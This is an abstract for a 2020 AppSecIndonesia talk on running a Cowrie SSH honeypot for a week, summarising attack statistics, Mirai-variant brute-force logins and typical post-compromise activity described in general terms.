The Fault in Our Shells: A Weekly Overview Running Cowrie presented at AppSecIndonesia2020 2020

by Ewaldo Simon Hiras,

Summary : I ran ssh honeypot on cloud environment for a week. I then dissected the result focusing on two things. The statistics, that is how many attacks happened, and other quantitative numbers. The second one is the qualitative sides, how the attackers behave and what kind of malware attacks. Most of the malware attacking are variants of mirai bots, the attack uses brute force of commonly used wordlist/ dictionary and some used default IoT logins. After gaining access, most of the malware do any or a combination of these activities, that is (1) fingerprint the OS, (2) download and run payload, and (3) contact C2 server, (4) persistance/ installing service (miner), (5) cleaning activities. Some malware failed miserably because of bad programming, but some are more sucessfull. Due to the limitation of the honeypot, not much payload activities can be seen. The paper then conclude by showing types of TTP's used, some funny fail script, and some tips on how to handle the types of malware this honeypot gets.